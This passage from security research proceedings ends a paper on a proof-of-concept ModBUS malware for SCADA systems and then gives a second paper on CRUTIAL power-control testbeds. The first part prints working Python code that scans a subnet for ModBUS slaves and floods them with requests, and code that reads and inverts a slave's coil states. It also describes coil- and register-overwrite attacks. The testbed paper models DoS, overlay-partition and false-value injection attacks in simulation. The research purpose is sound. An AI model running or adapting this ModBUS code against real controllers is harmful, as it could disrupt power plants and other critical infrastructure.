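The malware code itself is deliberately not published. Purely as an illustration of how the three logical units described above fit together, the following sketch combines a rudimentary discovery engine (probing a subnet for TCP port 502) with a packet deliverer that floods each discovered slave with well-formed ModBUS read requests; the subnet, timeouts and packet counts are assumptions, and the framing helper mirrors the sketch shown earlier:

```python
# Sketch of the DoS malware's structure: a discovery engine plus a
# packet deliverer flooding discovered slaves with legal ModBUS read
# requests (responses are ignored). The subnet is hypothetical;
# run only inside an isolated testbed.
import socket
import struct

def modbus_read_request(tid, unit=1, start=0, count=1):
    # Packet builder: MBAP header + Read Holding Registers PDU (0x03).
    pdu = struct.pack(">BHH", 0x03, start, count)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

def discover_slaves(subnet="192.168.0.", port=502):
    # Discovery engine: any host answering on TCP/502 is taken as a slave.
    slaves = []
    for i in range(1, 255):
        try:
            with socket.create_connection((subnet + str(i), port), 0.2):
                slaves.append(subnet + str(i))
        except OSError:
            pass
    return slaves

def flood(slave, port=502, packets=100_000):
    # Packet deliverer: saturate the slave with well-formed traffic.
    with socket.create_connection((slave, port)) as sock:
        for tid in range(packets):
            sock.sendall(modbus_read_request(tid & 0xFFFF))

for s in discover_slaves():
    flood(s)
```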
5.2 ModBUS Com Worm Scenario
As claimed before, the ModBUS protocol does not provide any security mechanism to protect the connections and the data flows. In particular, it
Table 1. Communication degradation during an attack, with a master scan rate of 500 ms and a connection timeout of 1200 ms

SCAN RATE: 500 ms, CONNECTION TIMEOUT: 1200 ms
Bitrate          Delay     Connection Timeout
43.6 kbits/sec   380 ms    No
81.3 kbits/sec   840 ms    No
99.2 kbits/sec   1120 ms   No
Table 2. Communication degradation during an attack, with a master scan rate of 200 ms and a connection timeout of 500 ms

SCAN RATE: 200 ms, CONNECTION TIMEOUT: 500 ms
Bitrate          Delay     Connection Timeout
43.6 kbits/sec   480 ms    No
81.3 kbits/sec   -         Yes
99.2 kbits/sec   -         Yes
does not provide any authentication or encryption mechanism. When a master sends a packet containing a command to a slave, the slave simply executes it without performing any check on the identity of the master or on the integrity of the packet received. With the porting of ModBUS over TCP, this approach has obviously shown all its limits from the security point of view. In fact, since the slave can verify neither the identity of the sender of the commands to be executed nor their integrity, any attacker able to forge ad-hoc ModBUS packets and having access to the network segment which hosts the slaves could force them to execute unauthorized operations, potentially compromising the stability of the system. If the system is a critical infrastructure like a power plant, the potential damage could be catastrophic.
Attack scope. In the light of what was claimed before, the scope of the Com worm attack is to take control of the slaves of the process control architecture, by taking advantage of the lack of authentication and integrity countermeasures in the ModBUS protocol.
5.3 Attack Implementation
We have implemented a particular kind of malware (a variant of the one presented in section 5.1) which, after discovering the ModBUS slaves connected to the same
network as the infected machine, starts sending them a set of correlated ModBUS packets in order to put the system into some critical state. More in detail, the malware is composed of the following logical units:
– A Packet builder, which forges well-formed ModBUS over TCP packets.
– A Discovery engine, which explores the network in order to identify the ModBUS slaves. This information is used by the following module to choose the attack strategy.
– A Strategy & analysis module, which, on the basis of the information gathered by the discovery engine and some built-in heuristics, identifies the strategy to adopt in order to send packets which could damage the system. As the scope of this paper was to prove the feasibility of a SCADA malware, the strategies defined by this module are actually very simple; of course, it would potentially be possible to create very complex and coordinated automatic strategies to damage the system.
– A Packet deliverer, which sends the forged packets to the target slaves.
As in the previous case, this malware, in order to be effective, needs the support of some "infection trigger" which allows it to reach the process network of the target SCADA system. The scenarios used in section 5.1 (i.e. the e-mail scenario, the phishing scenario and the worm scenario) are valid also in this case. Their description is the same, while the malware code obviously changes, being this time much more complex but, potentially, also much more dangerous.
Experimental Tests. In our experimental facility (reproducing the architecture of a typical power plant), we re-created the described scenarios. In all cases, the malware was able (a) to identify the slaves, and (b) to take control of the target slaves. In particular, as in the previous case, the scenario in which the malware is "nested" into the code of a worm (making use, again, of the MAlSim framework [13][14]) was the most effective. In our tests, we proceeded in an incremental manner, creating malware prototypes which were step by step more evolved:
– Step 1 malware: it replicates ModBUS function 15 (0x0F), used to force each coil in a sequence of coils to either ON or OFF in a remote device (slave). The request specifies the coil references to be forced; coils are addressed starting at 0, up to 1999. Closing or opening all the coils could have a very high impact on a SCADA system.
– Step 2 malware: its target is the input registers. Through function 16 it is able to write a block of contiguous input registers (1 to 123) in a remote device. This malware does not consider the meaning of the individual values, but writes into all registers the biggest allowed value: a 16-bit word.
– Step 3 malware: it combines two ModBUS functions: function 01 (0x01), used to read the output values, and function 15 (0x0F), used in the first attack to force a sequence of coils. The strategy adopted was the following: in order to increase the severity of the attack, the malware
reads the state of a sequence of coils and then forces the slave to invert the state of all the coils. In other words, the coil configuration is completely changed. Using this approach we have also developed, as described in the previous section, a malware which performs more articulated and coordinated malicious operations on the slaves. It is also important to note that our tests have illustrated how, in order to write an "attack strategy module" with high effectiveness, the attacker has to know at least the high-level details of the architecture of the system under attack.
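A minimal sketch of the Step 3 strategy, reading the coil states with function 0x01 and forcing the inverted pattern back with function 0x0F, is given below. The slave address and coil count are assumptions; the response offsets follow standard Modbus/TCP framing, and the single recv() per reply is a simplification:

```python
# Sketch of the Step 3 strategy: read a block of coils (function 0x01)
# and force the inverted pattern back (function 0x0F). Slave address
# and coil count are hypothetical; isolated-testbed use only.
import socket
import struct

def mbap(tid, pdu, unit=1):
    # MBAP header (7 bytes) prepended to the PDU.
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

def invert_coils(sock, start=0, count=16):
    # Read Coils: the reply is MBAP (7 bytes) + function + byte count
    # + byte-packed coil states (LSB = first coil).
    sock.sendall(mbap(1, struct.pack(">BHH", 0x01, start, count)))
    reply = sock.recv(260)
    byte_count = reply[8]
    coil_bytes = reply[9:9 + byte_count]
    # Force Multiple Coils: same block, every bit flipped.
    inverted = bytes(b ^ 0xFF for b in coil_bytes)
    pdu = struct.pack(">BHHB", 0x0F, start, count, byte_count) + inverted
    sock.sendall(mbap(2, pdu))
    sock.recv(260)

with socket.create_connection(("192.168.0.20", 502)) as sock:
    invert_coils(sock)
```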
6 Conclusions
With the massive introduction of ICT systems in production environments, the problem of the security of critical infrastructures is nowadays more and more relevant. The current trend for fighting this problem is to use the ICT security countermeasures traditionally deployed in the "office environment", such as PC antivirus software, general-purpose firewalls, etc. In this paper we presented what is, to our knowledge, the first proof of concept of malware tailored for SCADA systems. During our experimental tests, this malware, by adopting ad-hoc attack and infection strategies, was able to completely circumvent the traditional ICT security systems and, in its most evolved version, to take control of the field sensors and actuators. The impact of similar attacks in the real world, on systems like power plants, chemical industries, etc., could be dramatic. The use of encrypted channels and authentication mechanisms in the field and process networks, as presented in [6] for the DNP3 protocol, could help avoid the interference of infected third parties in a master/slave communication, but cannot be considered a complete shield when the infected actor is the master itself. More promising, in our opinion, would be a mixed architecture in which ad-hoc filtering and network monitoring systems, authentication and encryption are combined in order to detect and avoid anomalous behaviors. In the future, we plan to use the results of our experimental tests and the testing infrastructure built to support them in order to study more effective protocols, architectures and policies supporting the identification of, and protection against, this kind of threat.
References
1. Dondossola, G., Masera, M., Nai Fovino, I., Szanto, J.: Effects of intentional threats to power substation control systems. International Journal of Critical Infrastructures (IJCIS) 4(1/2) (2008)
2. Nai Fovino, I., Masera, M., Leszczyna, R.: ICT Security Assessment of a Power Plant, a Case Study. In: Proceedings of the Second Annual IFIP Working Group 11.10 International Conference on Critical Infrastructure Protection, George Mason University, Arlington, USA (March 2008)
3. Huitsing, P., Chandia, R., Papa, M., Shenoi, S.: Attack Taxonomies for the Modbus Serial and TCP Protocols. In: Proceedings of the Second Annual IFIP Working Group 11.10 International Conference on Critical Infrastructure Protection, George Mason University, Arlington, USA (March 2008)
4. Creery, A., Byres, E.: Industrial Cybersecurity for power system and SCADA networks. IEEE Industry Applications Magazine (July-August 2007)
5. Chandia, R., Gonzalez, J., Kilpatrick, T., Papa, M., Shenoi, S.: Security Strategies for SCADA Networks. In: Proceedings of the First Annual IFIP Working Group 11.10 International Conference on Critical Infrastructure Protection, Dartmouth College, Hanover, New Hampshire, USA, March 19-21 (2007)
6. Majdalawieh, M., Parisi-Presicce, F., Wijesekera, D.: Distributed Network Protocol Security (DNPSec) security framework. In: Proceedings of the 21st Annual Computer Security Applications Conference, Tucson, Arizona, December 5-9 (2005)
7. Hong, J.H.C.S., Ho Ju, S., Lim, Y.H., Lee, B.S., Hyun, D.H.: A Security Mechanism for Automation Control in PLC-based Networks. In: Proceedings of ISPLC 2007, IEEE International Symposium on Power Line Communications and Its Applications, Pisa, Italy, March 26-28, pp. 466–470 (2007)
8. Mander, T., Nabhani, F., Wang, L., Cheung, R.: Data Object Based Security for DNP3 Over TCP/IP for Increased Utility Commercial Aspects Security. In: Proceedings of the Power Engineering Society General Meeting, Tampa, FL, USA, June 24-28, pp. 1–8. IEEE, Los Alamitos (2007)
9. Jones, A., Ashenden, D.: Risk Management for Computer Security: Protecting Your Network & Information Assets. Elsevier, Amsterdam (2005)
10. Alhazmi, O., Malaiya, Y., Ray, I.: Security Vulnerabilities in Software Systems: A Quantitative Perspective. In: Jajodia, S., Wijesekera, D. (eds.) Data and Applications Security 2005. LNCS, vol. 3654, pp. 281–294. Springer, Heidelberg (2005)
11. Bishop, M.: Computer Security: Art and Science. Addison Wesley, Reading (2004)
12. http://www.modbus.org/
13. Leszczyna, R., Nai Fovino, I., Masera, M.: MAlSim - Mobile Agent Malware Simulator. In: Proceedings of the First International Conference on Simulation Tools and Techniques for Communications, Networks and Systems, Marseille (2008)
14. Leszczyna, R., Nai Fovino, I., Masera, M.: Simulating Malware with MAlSim. In: Proceedings of the 17th EICAR Annual Conference 2008, Laval, France (2008)
Testbeds for Assessing Critical Scenarios in Power Control Systems
Giovanna Dondossola1, Geert Deconinck2, Fabrizio Garrone1, and Hakem Beitollahi2
1 CESI RICERCA, Milano, Italy
2 K.U. Leuven ESAT, Kasteelpark Arenberg 10, 3001 Leuven, Belgium
[email protected]
Abstract. The paper presents a set of control system scenarios implemented in two testbeds developed in the context of the European Project CRUTIAL - CRitical UTility InfrastructurAL Resilience. The selected scenarios refer to power control systems, encompassing information and communication security of SCADA systems for grid teleoperation, the impact of attacks on inter-operator communications in power emergency conditions, and the impact of intentional faults on the secondary and tertiary control in power grids with distributed generators. The two testbeds have been developed for assessing the effects of the attacks and prototyping resilient architectures. Keywords: power control systems, SCADA systems, grid teleoperation, voltage and frequency control, inter-utility communications, power emergency conditions, cyber security, resilient architectures.
1 Introduction
In the context of the protection of critical information infrastructures, the need to address infrastructures owned, operated and used by the power utilities is considered fundamental to security, the economy and quality of life at national and international levels [1]. Electricity market liberalisation, the energy revolution and technology breakthroughs are three determining factors in the introduction of advanced networked systems for the security and adequacy of modern electric power systems. However, networks based on Information and Communication Technologies (ICT) create many interdependencies among geographically distributed infrastructures controlled by multiple stakeholders, which motivates research and technology developments able to reduce the cyber risk and to defend power utility infrastructures from intentional and accidental threats. A wide set of control system scenarios has been identified by the CRUTIAL project [2], presenting how dependencies among (segments of) power, control and information infrastructures enable the propagation of failures and the appearance of cross-cascading and escalating phenomena [3]. Two CRUTIAL testbeds are under development in the CESI RICERCA and K.U.Leuven research laboratories, with the aim of assessing the ICT system's vulnerability to plausible cyber attacks and evaluating the resilience of possible architectures/mechanisms/solutions
to such threats [4]. A subset of CRUTIAL scenarios within both testbeds has been selected for presentation in the present paper, according to the following structure. Section 2 focuses on scenarios related to the DSO (Distribution System Operator) and TSO (Transmission System Operator) teleoperation systems, while section 3 presents scenarios related to control systems for distributed energy resources. Sections 4 and 5 describe both testbeds.
2 Security in Hierarchical Power Control Systems
Two CRUTIAL interdependency scenarios from [2] are presented, covering several control systems involved in both manual teleoperation and automatic emergency management of the power grid.
2.1 Communication Security of Grid Teleoperation
The main purpose of this scenario consists in assessing the security of the ICT components involved in the teleoperation activities of a DSO operator, through the analysis of cross-cascading effects due to threat occurrence in both normal and abnormal power conditions. In general terms, a SCADA system for grid teleoperation is working when it is able to perform its monitoring and control functions. This may happen when the power service is stable (for operational and maintenance needs), but also in abnormal or even emergency conditions. The teleoperation activity includes:
– continuous monitoring of substation status: information flows from substation to centre, partly on a continuous basis (measurements related to active power P, reactive power Q, voltage V and breaker positions) and partly (e.g. alarms and status variations) as asynchronous flows;
– interventions on the grid configuration (opening/closing breakers, line trips, etc.) due to several needs, such as predictive maintenance, DSO contingency management and preventive control requested by the TSO (like rotating load shedding plans and variations in transformer tap changers).
The core ICT systems involved in the supervision and control activities are the ATC (Area Telecontrol Centres, whose operator's console is shown in figure 1), controlling the power substations, and the substation automation systems connected to their centres through Wide Area Networks (WAN). Following an ongoing trend in the utilities' communication technology renewal, the information flow supporting DSO teleoperation is transmitted over standard telecom IP backbones owned and operated by external providers, who supply virtual, dedicated channels over communication links shared with other customers. From the DSO perspective, such a communication infrastructure may be targeted by security threats sourced within the Telco infrastructure. Due to the strong availability requirements on the communication system (availability equal to 0.99999), redundant communication paths are used, implemented over physically independent carrier lines, possibly owned by distinct telecommunication providers. The correct execution of the DSO teleoperation requires the
Fig. 1. DSO Operator’s Console
satisfaction of strict refresh time requirements for measurements/alarms and delivery time requirements for the operator's commands. The ICT threats that may affect the communication infrastructure range from Denial of Service (DoS) attacks on the telecontrol communications to intrusions into the centre/substation communication flow, possibly followed by the execution of faked commands through the exploitation of the vulnerabilities of the standard application layer protocols used for monitoring activities and command transmission [2]. DoS attacks on the teleoperation communications, generated by enemies located on the telecom IP backbone, are being explored first. Such DoS attack processes against IPv4/IPSec channels target both DSO centre and substation routers/gateways/firewalls. The identified attack plan includes a sequence of attacks of increasing severity, starting from the denial of the supervision function and maintenance activities, moving on to precluding the DSO operator from properly performing contingency management, up to denying the execution of the defence actions in pre-emergency conditions. The simulation of attack processes on the testbed will allow i) assessing the capability of the secure and redundant communication architecture to tolerate the threat hypotheses, and evaluating the possible cascading effects in the presence of power contingencies; ii) assessing the vulnerabilities of the activities based on standard protocols (e.g. IEC 60870-5-104); iii) assessing the sharing of the same channel between real-time and non-real-time activities. The severity of the cascading effects demonstrated in the laboratory testbed is expected to vary depending on i) the grid operating conditions during the ICT attacks, ii) the number of substations involved, and iii) the level of urgency of the teleoperation intervention. In normal conditions, an attack on a single substation site is not expected to lead the power system into a critical status. However, if
the DSO operator is repairing a previous contingency, the attack may prolong the duration of the power service interruption. Even worse, if the operator's intervention is aimed at facing a pre-emergency situation that occurred in the higher-level grid, the impossibility of performing the defence action may put the whole system in jeopardy.
2.2 Impact of Attacks on TSO Emergency Management
The realisation of technologically integrated defence plans requires that in emergency conditions the TSO is authorised by the DSO to activate defence actions, consisting of the automatic execution of load shedding activities on the distribution grid. This scenario explores the security of the communications between the TSO and DSO under emergency operating conditions (i.e. overloading of power lines), assessing the possible cross-cascading effects of ICT threats to the communication channels connecting TSO and DSO control centres and substations. The TSO control centre monitors the Electric Power System and identifies potential emergency conditions that could be remedied with opportune load shedding actions applied to particular areas of the grid. In order to actuate the defence actions, the TSO centre chooses a subset of HV/MV substations from the list of substations participating in the emergency plan, then sends requests to preventively arm the automation devices of these substations to the interested DSO area control centres. These requests are delivered through a communication channel between the TSO centre and the interested DSO centres. The DSO centres arm the required substations and return their status to the TSO centre. In case the potential emergency condition evolves into a real emergency situation, a TSO sentinel device sends the trip command, which has to be delivered through the communication network within 600 ms to recover the emergency. It is worth noting that TSO arm requests are asynchronous with respect to the trip commands. The objective of the TSO is to maintain the electric power system in a secure state. In order to prevent the escalation of a possible emergency situation, the TSO Energy Management System frequently selects detachable loads and emits arm requests to their corresponding control centres. The investigated threats are the same as in the previous scenario, but the communication network is more complex because it interconnects two separate (TSO and DSO) teleoperation networks. Cyber attacks carried out under emergency conditions, when defence actions have to be performed under strict real-time constraints, can cause severe damage: inhibiting the proper execution of the required automatic load shedding actions may provoke the degeneration of the emergency in the transmission grid. The effects of the considered ICT attacks on the whole power system will depend on the number of components involved. As in the previous case, the severity of ICT-power cascading effects depends on the specific sequencing of attacks during the ongoing emergency procedure.
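The arm/trip interaction just described lends itself to a compact sketch. The following is a hypothetical illustration of the DSO-side message handling, with the 600 ms delivery constraint made explicit; all class and method names are invented for this example and do not come from the testbed.

```java
import java.time.Duration;
import java.time.Instant;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

/** Hypothetical sketch of DSO-side handling of TSO arm requests and trip commands. */
public class DefenceActionHandler {
    static final Duration TRIP_DEADLINE = Duration.ofMillis(600);

    // Substations currently armed for load shedding, keyed by substation id.
    private final Map<String, Boolean> armed = new ConcurrentHashMap<>();

    /** Arm requests arrive asynchronously with respect to trip commands. */
    void onArmRequest(String substationId) {
        armed.put(substationId, true);
        // A real DSO centre would also report the arming status back to the TSO here.
    }

    /** A trip command is only effective if delivered within the 600 ms deadline. */
    boolean onTripCommand(String substationId, Instant sentAt) {
        Duration latency = Duration.between(sentAt, Instant.now());
        if (latency.compareTo(TRIP_DEADLINE) > 0) {
            return false; // delivered too late: the emergency may already have escalated
        }
        return armed.getOrDefault(substationId, false); // shed load only if armed
    }
}
```

One consequence worth noting: a DoS attack that merely delays packets past the deadline is as damaging here as one that blocks them outright.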
3 Control Vulnerabilities for Distributed Energy Resources
The penetration of distributed generation in the electricity grid is increasing [5]. For optimal deployment of distributed energy resources (DER, such as generators and storage units), the underlying control applications are also distributed and require communication among the intelligent electronic devices (IED) [6]. It is therefore necessary to investigate the impact of different types of ICT anomalies on this communication network and on the control applications, and hence to identify the vulnerabilities. Examples of such anomalies include physical (random) faults and intrusions (malicious faults). To this end, a 16-node radial segment of a grid with several DER has been simulated together with its control algorithms (figure 2). The simulation has been set up as a set of communicating Java processes, running in a Linux environment on a workstation PC. The electrical topology and parameters can be set via a configuration file. In each time step, the resulting electrical equilibrium is calculated as generator and load profiles change.
Fig. 2. Radial distribution segment with DER used in simulations
This simulated distribution grid segment has 3 branches with 15 nodes (each representing a generator and a load) and is connected via a transformer to the higher-level electricity grid. Three control applications are integrated. A primary control algorithm controls active power output based on the local voltage level only, i.e. it does not require communication. Frequency is kept stable by the connection to the external power grid via node 16. Secondary control (keeping voltage and frequency within their limits) and tertiary control (economic optimisation), however, are based on communication among the nodes. In the simulation, a decentralised approach has been chosen for this communication, in which the IEDs of the loads and generators of the radial distribution segment use an overlay network that is set up on top of the physical communication infrastructure [7,8]. Such an overlay network makes it possible to deal with random faults as well as with dynamic changes in the topology [9]. Secondary and tertiary control are based on a gossiping algorithm on top of the overlay network. It is assumed that communication
delays and gossiping intervals are at least an order of magnitude larger than the time needed for the primary control loop to settle. In the simulations, this means that power flow calculations and primary control actions are first iterated until convergence is observed. Only then do the IEDs associated with generators gossip and adjust the parameters of their primary control loops according to the results of the secondary and tertiary control loops. When all generators have finished gossiping, new power flow calculations are run until convergence, and so on. The number of iterations is chosen in advance; a schematic reconstruction of this schedule is sketched below. For tertiary control purposes, cost curves are associated with the generators; they are chosen to be monotonically increasing linear functions with a marginal cost for zero output (which is not necessarily zero) and some marginal cost for the generator's maximum output. The feed-in transformer has no bounds on the amount of power it can inject into the distribution net (which is realistic for the power levels in the presented DER scenarios). The transformer has a relatively high marginal cost curve, which increases as injected power increases. This high price favours production by local generators. In all presented scenarios a similar load profile is applied. Generators start from set point P0 (desired power output) and loads have a fixed consumption. Imbalances between local supply and demand are automatically dealt with by the transformer. At time instance (or iteration) 21 several loads increase consumption and at time instance 121 several loads decrease it. Hence, one will typically observe three phases during a simulation:
– t = [1..20]: steady settlement of initial settings to the global optimum.
– t = [21..120]: demand increases; initially, the feeder resolves the imbalance and some distributed generators react as well (if the local voltage drop is high enough). Afterwards, they adjust their power output to evolve towards the optimum.
– t = [121..181]: demand suddenly decreases; again, the feeder and some distributed generators resolve the imbalance, after which all power outputs are adjusted towards the new optimum.
Simulation results are displayed using three graphs, showing information on all generators and the feeder transformer at every time step: active power output P, voltage level V and marginal cost C of each generator. The simulations have been performed first without ICT anomalies (reference results not shown here) and subsequently, in different experiments, subject to several threats on the communication network among the IEDs.
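The following Java outline is an illustrative reconstruction of that schedule, not the authors' code; all type and method names are hypothetical.

```java
/** Illustrative reconstruction of the simulation schedule; all names are hypothetical. */
interface Grid {
    void applyLoadProfile(int t);      // demand steps at t = 21 and t = 121
    void solvePowerFlow();
    void runPrimaryControl();          // local voltage-based active power control
    boolean converged();
    Iterable<Ied> generatorIeds();
}

interface Ied {
    void gossipSecondaryAndTertiary(); // one gossip round over the overlay network
}

class SimulationSchedule {
    /** Gossiping happens only after primary control has fully settled. */
    static void run(Grid grid, int iterations) {
        for (int t = 1; t <= iterations; t++) {
            grid.applyLoadProfile(t);
            do {                                   // fast loop: power flow + primary control
                grid.solvePowerFlow();
                grid.runPrimaryControl();
            } while (!grid.converged());
            for (Ied ied : grid.generatorIeds()) { // slow loop: secondary/tertiary control
                ied.gossipSecondaryAndTertiary();
            }
        }
    }
}
```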
3.1 Denial-of-Service Attacks on IP-Network
A denial-of-service (DoS) attack tries to disturb the functionality of a service by flooding the service provider with fake or unfinished requests. Such a DoS can be generic (caused by a worm attacking random computers/networks) or targeted (e.g. by constantly joining and leaving the overlay network, which triggers a bandwidth-consuming algorithm for finding new neighbours) and may lead to a denial of all communication over one or more channels. Whatever the underlying reason or mechanism of the DoS attack, it results in long communication delays.
Fig. 3. Power output and voltage level when overlay network is partitioned
Fig. 4. Marginal production costs when overlay network is partitioned
These delays lead to loss of connection between IEDs while they are participating in the secondary and tertiary control schemes. As such, the system degenerates to a distribution segment in which some generators do not take part in the control applications. Hence the secondary and tertiary control algorithms will not converge to a global optimum, but rather seek an optimal solution among the participating IEDs.
3.2 Attack on Overlay Network Topology
A different scenario is an attack on the topology of the overlay network by one or more malicious nodes. During the set-up and maintenance of the overlay network, such malicious nodes send fake results to nodes searching for new neighbours, so as to make themselves the new neighbour of these nodes. After some time, these malicious
nodes become a centre of the overlay network. The overlay network may partition into separate parts as a result of such a malicious attack (or as a result of a major communication infrastructure failure, which partitions the underlying physical network). In the simulation, the overlay network partitions into two groups: i) the IEDs of generators 1 to 9, and ii) the IEDs of generators 10 to 15 together with the grid-connected transformer. Note that the system remains connected electrically. The splitting of the overlay network results in two groups of generators that converge locally - but not globally (figure 3). For the cost curve (figure 4), this results in convergence to two different cost levels, whereas a single equal marginal cost for all generators is the global optimum.
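The effect is easy to reproduce with a toy model. The snippet below is a minimal pairwise-averaging gossip (standing in for the actual CRUTIAL algorithms, which are not shown in the paper): because averaging preserves the sum within each connected component, a partitioned overlay converges to one value per component instead of the single global optimum.

```java
import java.util.Arrays;
import java.util.List;

/** Toy pairwise-averaging gossip illustrating the effect of an overlay partition. */
public class GossipPartitionDemo {

    /** One gossip round: each pair of overlay neighbours averages its values. */
    static void gossipRound(double[] value, List<int[]> overlayEdges) {
        for (int[] e : overlayEdges) {
            double avg = (value[e[0]] + value[e[1]]) / 2.0;
            value[e[0]] = avg;
            value[e[1]] = avg;
        }
    }

    public static void main(String[] args) {
        double[] marginalCost = {1.0, 2.0, 3.0, 10.0, 11.0, 12.0};
        // Partitioned overlay: nodes 0-2 and nodes 3-5 cannot reach each other.
        List<int[]> edges = List.of(new int[]{0, 1}, new int[]{1, 2},
                                    new int[]{3, 4}, new int[]{4, 5});
        for (int round = 0; round < 50; round++) {
            gossipRound(marginalCost, edges);
        }
        // Each component settles at its own level (about 2.0 and 11.0) instead of
        // the single global value (6.5): two cost levels, as in Fig. 4.
        System.out.println(Arrays.toString(marginalCost));
    }
}
```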
3.3 Voltage Level Attack
As indicated above, the secondary control algorithm implemented among the IEDs optimizes the voltage levels in all points of the distribution grid segment so as to minimize the divergence from rated values. Since over-voltages can damage equipment attached to the power grid, attacks on the secondary control loop can induce over-voltages which can trigger the protection, leading to local black-outs, or physically damage grid assets. A malicious node could inject false values into the secondary control loop (which is based on a distributed averaging algorithm on top of the overlay network). Over time, these errors accumulate and the global average diverges from its correct value, leading to incorrect IED set points. The simulation shows the result of a malicious IED repeatedly injecting large values into the distributed averaging algorithm of the secondary control loop. Such a large value normally means that voltage levels are low in most parts of the distribution grid, and this encourages the other generators to increase active power production.
Fig. 5. Power output and voltage levels when malicious node injects incorrect values, resulting in a voltage level attack
Figure 5 shows that all local generators increase their production and that the power output of the feeding transformer decreases below zero, meaning that excess power flows back to the higher-level grid. However, these increasing power injections also raise local voltages to dangerous levels, and thus the malicious node has succeeded in mounting a voltage level attack.
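Reusing the toy averaging model from section 3.2, the snippet below illustrates why the error accumulates: honest pairwise averaging preserves the sum of the values, so a stubborn node that resets its own state to a large false value after every round injects new "mass" into the network each time, dragging the computed average ever further from the truth. Again, this is an illustration of the mechanism, not the testbed's actual control code.

```java
import java.util.Arrays;
import java.util.List;

/** Toy model: a stubborn malicious node biases distributed averaging over time. */
public class AveragingAttackDemo {
    public static void main(String[] args) {
        double[] v = {0.0, 0.0, 0.0, 0.0};   // the honest global average would be 0.0
        List<int[]> edges = List.of(new int[]{0, 1}, new int[]{1, 2}, new int[]{2, 3});
        int attacker = 0;
        for (int round = 0; round < 20; round++) {
            v[attacker] = 100.0;             // re-inject a large false value every round
            for (int[] e : edges) {
                double avg = (v[e[0]] + v[e[1]]) / 2.0;
                v[e[0]] = avg;
                v[e[1]] = avg;
            }
        }
        // The injected mass accumulates: honest nodes read a high "average",
        // interpret it as low voltage, and raise their active power output.
        System.out.println(Arrays.toString(v));
    }
}
```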
4 Resilience Assessment of Teleoperation Systems
The laboratory testbed for teleoperation systems realises a prototypal but significant power system management architecture with its integrated ICT infrastructure. Focus is placed on developing those aspects of the actual power control system that can be used to implement a set of significant attack scenarios, in order to evaluate their plausibility, to demonstrate the possible evolution of the attack processes and to assess the severity of the potential damage to the attacks' targets. Besides the two scenarios described in section 2, the testbed architecture deploys two further interdependency scenarios described in [4], addressing security issues arising in the integration of operation and maintenance data and in the centralised maintenance of ICT devices, including communication and control devices. The communication architecture is based on the following assumptions:
– the two lower layers of the OSI stack (physical and data link) are modelled by switched Ethernet, both for local and wide area communications;
– TCP/IP and UDP/IP are used at the transport/network layers;
– the application layer data exchange does not make use of commercial protocols, but the contents of the Application Protocol Data Units (APDUs) are compliant with the appropriate standards (IEC 60870-6 Inter-Control Centre Communications Protocol ICCP/TASE.2, IEC 60870-5-104 for centre-substation communications, IEC 61850 for communications within the substations).
Fig. 6. Grid teleoperation testbed
Figure 6 gives the layout of the testbed platform implementing the TSO and DSO teleoperation of two HV/MV substations.
5 Testbed for Vulnerability Assessment of DER Control
A high penetration of DER has a considerable impact on the electrical and control aspects of the grid [10,11], and it also provides many opportunities for distributed control [12,13,14]. In order to test the cyber problem scenarios [15,16] in the DER control applications presented in section 3 - based on simulation - on a real set-up, a laboratory testbed has been built, consisting of IEDs - implementing the control and communication - that control power electronic converters, which are connected electrically in a microgrid. These converters emulate distributed energy resources, such as small-scale electricity generators (photovoltaic systems, wind turbines), loads (possibly voltage/frequency dependent) and energy storage devices (e.g. a battery or fuel cell). The IEDs are responsible for the primary control of the converters, but also for the secondary and tertiary control algorithms on top of the communication network. The platform, consisting of converters and IEDs, allows control applications to be modelled in a high-level programming tool (Matlab/Simulink), after which they are downloaded onto the hardware for execution on the created microgrid [17]. This Matlab/Simulink interface also provides a real-time interface on the IED to the physical electronic hardware, in order to monitor and control it. The IEDs are based on industrial Linux-based PCs, extended with the real-time framework Xenomai [18]. The Matlab/Simulink tools on the different IEDs associated with different converters are interconnected by standard communication technology (Ethernet and TCP/IP). This set-up allows analysing the effects of different types of faults in the communication network on the electrical control applications (secondary and tertiary control, data aggregation, power quality monitoring and mitigation, demand side management, etc.). As such, this testbed evaluates the dependencies of the electric power system on the information infrastructure, and assesses the robustness of the control algorithms to disturbances (figure 7).
Fig. 7. DER testbed: converter platform (left) and setup of DER interconnected electrically (thick lines) with corresponding IED interconnected via communication (dashed)
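As an aside, the hard part of such an IED is keeping the primary control loop strictly periodic while non-real-time communication runs alongside it. The fragment below is a plain-Java caricature of a periodic control task with deadline-overrun detection; the actual testbed uses Xenomai real-time tasks and Matlab/Simulink-generated code, so everything here (period, names, logic) is illustrative only.

```java
import java.util.concurrent.locks.LockSupport;

/** Illustrative periodic control task with overrun detection (the real
    testbed uses Xenomai real-time tasks, not plain Java threads). */
public class PeriodicControlTask implements Runnable {
    static final long PERIOD_NANOS = 1_000_000L; // assumed 1 ms control period

    @Override
    public void run() {
        long next = System.nanoTime();
        while (!Thread.currentThread().isInterrupted()) {
            next += PERIOD_NANOS;
            controlStep();                        // read sensors, update converter set point
            long slack = next - System.nanoTime();
            if (slack < 0) {
                System.err.println("deadline overrun by " + (-slack) + " ns");
                next = System.nanoTime();         // resynchronise after an overrun
            } else {
                LockSupport.parkNanos(slack);     // sleep away the remaining slack
            }
        }
    }

    private void controlStep() {
        // converter-specific control law would go here
    }
}
```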
6 Conclusions
The paper presents intermediate results of the activities undertaken within the European project CRUTIAL, related to the development of testbeds for assessing the impact of ICT threats on power control systems. The K.U.Leuven microgrid testbed is set up to evaluate the behaviour of ICT-driven decentralised control algorithms in microgrids with a large penetration of DER. By interconnecting IEDs over an ICT infrastructure - besides interconnecting the DER electrically - it is possible to evaluate the opportunities and vulnerabilities of such coupled infrastructures. In future work, this ICT infrastructure will integrate CRUTIAL middleware modules to make it more robust to different types of faults. The testbed will be used to assess and analyse their effect on the microgrid control behaviour. The CESI RICERCA testbed addresses both concrete needs and envisaged evolutions of power grid control systems. The testbed scenarios evaluate to what extent complex control infrastructures implementing multiple operators' defence actions can be protected by resilient ICT architectures. The scenarios cover emerging themes such as information and communication security aspects of power substation control, support for emergency management by the distribution grid control, interactions between process control and corporate activities, and remote maintenance of ICT automation devices. The testbed architecture reflects the WAN-of-LANs communication topology of the CRUTIAL reference architecture, including VPNs and firewall filtering techniques. The Human Machine Interface applications supporting the scenario evolution within the CRUTIAL testbed enrich the typical supervision and control functionality currently available in control rooms with ICT-related information that may increase the situation awareness of the operators and their capability to promptly recover from 